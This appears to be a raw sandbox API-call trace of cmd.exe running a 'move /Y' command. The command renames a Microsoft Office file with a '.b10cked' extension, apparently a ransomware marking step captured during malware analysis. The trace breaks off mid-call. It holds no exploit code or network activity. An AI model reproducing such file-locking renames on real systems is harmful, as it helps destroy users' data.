GetTickCount () returned 0x32338 [0172.231] QueryPerformanceCounter (in: lpPerformanceCount=0x20fdc4 | out: lpPerformanceCount=0x20fdc4*=22902004557) returned 1 [0172.231] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.231] __set_app_type (_Type=0x1) [0172.231] __p__fmode () returned 0x76b331f4 [0172.232] __p__commode () returned 0x76b331fc [0172.232] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.232] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.232] GetCurrentThreadId () returned 0x9d8 [0172.232] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9d8) returned 0x38 [0172.232] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.232] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.232] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.232] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.232] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fd5c | out: phkResult=0x20fd5c*=0x0) returned 0x2 [0172.232] VirtualQuery (in: lpAddress=0x20fd93, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.232] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.232] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.232] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.232] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fd2c, dwLength=0x1c | out: lpBuffer=0x20fd2c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.232] GetConsoleOutputCP () returned 0x1b5 [0172.233] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.233] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.233] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.233] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.233] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.233] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.233] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.233] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.233] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.234] GetEnvironmentStringsW () returned 0x340210* [0172.234] FreeEnvironmentStringsW (penv=0x340210) returned 1 [0172.234] GetEnvironmentStringsW () returned 0x340210* [0172.234] FreeEnvironmentStringsW (penv=0x340210) returned 1 [0172.234] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eccc | out: phkResult=0x20eccc*=0x40) returned 0x0 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0xa0, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x0, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0172.234] RegCloseKey (hKey=0x40) returned 0x0 [0172.234] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eccc | out: phkResult=0x20eccc*=0x40) returned 0x0 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x40, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0172.234] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.235] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x1, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0172.235] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x0, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.235] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x9, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.235] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x4, lpData=0x20ecd8*=0x9, lpcbData=0x20ecd0*=0x4) returned 0x0 [0172.235] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ecd4, lpData=0x20ecd8, lpcbData=0x20ecd0*=0x1000 | out: lpType=0x20ecd4*=0x0, lpData=0x20ecd8*=0x9, lpcbData=0x20ecd0*=0x1000) returned 0x2 [0172.235] RegCloseKey (hKey=0x40) returned 0x0 [0172.235] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886388 [0172.235] srand (_Seed=0x5b886388) [0172.235] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked\"" [0172.235] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked\"" [0172.235] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.235] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x341970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.235] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.235] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.236] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.236] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.236] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.236] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.236] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.236] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0172.236] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.236] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.236] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.236] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.236] GetEnvironmentStringsW () returned 0x342360* [0172.236] FreeEnvironmentStringsW (penv=0x342360) returned 1 [0172.236] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.236] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.236] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.236] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.236] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.236] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.236] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.236] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.236] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.236] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.236] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fa98 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.236] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fa98, lpFilePart=0x20fa94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fa94*="Desktop") returned 0x18 [0172.236] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.237] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f814 | out: lpFindFileData=0x20f814) returned 0x3409f0 [0172.237] FindClose (in: hFindFile=0x3409f0 | out: hFindFile=0x3409f0) returned 1 [0172.237] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f814 | out: lpFindFileData=0x20f814) returned 0x3409f0 [0172.237] FindClose (in: hFindFile=0x3409f0 | out: hFindFile=0x3409f0) returned 1 [0172.237] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f814 | out: lpFindFileData=0x20f814) returned 0x3409f0 [0172.237] FindClose (in: hFindFile=0x3409f0 | out: hFindFile=0x3409f0) returned 1 [0172.237] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.237] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.237] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.237] GetEnvironmentStringsW () returned 0x340210* [0172.237] FreeEnvironmentStringsW (penv=0x340210) returned 1 [0172.237] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.238] GetConsoleOutputCP () returned 0x1b5 [0172.238] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.238] GetUserDefaultLCID () returned 0x409 [0172.238] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.238] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fbd8, cchData=128 | out: lpLCData="0") returned 2 [0172.238] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fbd8, cchData=128 | out: lpLCData="0") returned 2 [0172.238] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fbd8, cchData=128 | out: lpLCData="1") returned 2 [0172.238] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.239] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.239] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.240] GetConsoleTitleW (in: lpConsoleTitle=0x330930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.240] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.240] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.240] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.240] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.241] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.241] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.241] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.241] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.241] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.241] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.241] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0172.244] GetConsoleTitleW (in: lpConsoleTitle=0x20f8d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.244] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.244] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.244] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.244] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.244] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.244] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.244] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.244] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.244] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.244] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.244] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.245] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.245] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.245] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.245] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.245] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.245] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.245] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.245] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.245] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.245] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.245] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.245] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.245] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.245] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.245] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.245] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.245] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.245] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.245] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.245] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.245] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.245] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.245] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.245] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.247] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.247] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.247] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f68c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f684, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f684*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.248] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.483] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0172.483] _wcsicmp (_String1="ONINTL~2.TRX", _String2=".") returned 65 [0172.483] _wcsicmp (_String1="ONINTL~2.TRX", _String2="..") returned 65 [0172.483] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl~2.trx")) returned 0x2020 [0172.483] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x341f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.484] SetErrorMode (uMode=0x0) returned 0x0 [0172.484] SetErrorMode (uMode=0x1) returned 0x0 [0172.484] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x20f014, lpFilePart=0x20effc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX", lpFilePart=0x20effc*="ONINTL~2.TRX") returned 0x3c [0172.484] SetErrorMode (uMode=0x0) returned 0x1 [0172.484] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.484] _wcsicmp (_String1="ONINTL~2.TRX", _String2=".") returned 65 [0172.484] _wcsicmp (_String1="ONINTL~2.TRX", _String2="..") returned 65 [0172.484] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl~2.trx")) returned 0x2020 [0172.484] SetErrorMode (uMode=0x0) returned 0x0 [0172.484] SetErrorMode (uMode=0x1) returned 0x0 [0172.484] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x20f490, lpFilePart=0x20f228 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX", lpFilePart=0x20f228*="ONINTL~2.TRX") returned 0x3c [0172.484] SetErrorMode (uMode=0x0) returned 0x1 [0172.485] SetErrorMode (uMode=0x0) returned 0x0 [0172.485] SetErrorMode (uMode=0x1) returned 0x0 [0172.485] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20f698, lpFilePart=0x20f228 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked", lpFilePart=0x20f228*="ONINTL.REST.trx_dll.b10cked") returned 0x4b [0172.485] SetErrorMode (uMode=0x0) returned 0x1 [0172.485] SetLastError (dwErrCode=0x0) [0172.485] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.rest.trx_dll.b10cked")) returned 0xffffffff [0172.485] GetLastError () returned 0x2 [0172.485] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x20eba4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20eba4) returned 0x342130 [0172.485] FindNextFileW (in: hFindFile=0x342130, lpFindFileData=0x20eba4 | out: lpFindFileData=0x20eba4) returned 0 [0172.486] GetLastError () returned 0x12 [0172.486] FindClose (in: hFindFile=0x342130 | out: hFindFile=0x342130) returned 1 [0172.487] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x341cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341cc0) returned 0x342130 [0172.488] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20ee3c, lpFilePart=0x0 | out: 